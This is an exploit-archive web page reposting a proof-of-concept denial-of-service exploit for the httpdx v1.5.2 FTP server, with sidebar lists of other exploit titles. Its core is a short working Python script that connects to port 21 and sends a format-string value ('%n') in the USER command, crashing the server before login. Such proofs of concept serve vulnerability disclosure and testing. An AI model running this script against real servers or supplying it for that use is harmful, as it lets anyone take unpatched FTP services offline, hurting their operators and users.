首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)
来源:vfocus.net 作者:loneferret 发布时间:2010-02-08  

# Title: httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)
# Found by: loneferret
# Hat's off to dookie2000ca
# Discovered on: 06/02/2010
# Software link: http://httpdx.sourceforge.net/downloads/
# Tested on: Windows XP SP3 Professional

# Nod to the Exploit-DB Team

#!/usr/bin/python

import socket

buffer = "\x25\x6e"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21)) #Remember to put in the server's address
s.recv(1024)
s.send('USER '+ buffer +'\r\n') #yup, doesn't take much does it.
s.recv(1024) #
s.close #don't really need these, force of habit


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·X-lite SIP v3 (wav) memory cor
·Safari v4.0.4, Firefox v3.5.6,
·FoxPlayer 1.7.0 (.m3u) Local B
·Solaris/Open Solaris UCODE_GET
·Opera 10.10 Remote Code Execut
·Ipswitch IMAIL 11.01 reversibl
·Signed Applet Social Engineeri
·'Wireshark LWRES Dissector get
·GNOME Nautilus code execution
·Audiotran 1.4.1 (PLS File) Sta
·Ipswitch IMail Server - IMAP4
·AstonSoft DeepBurner (DBR File
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved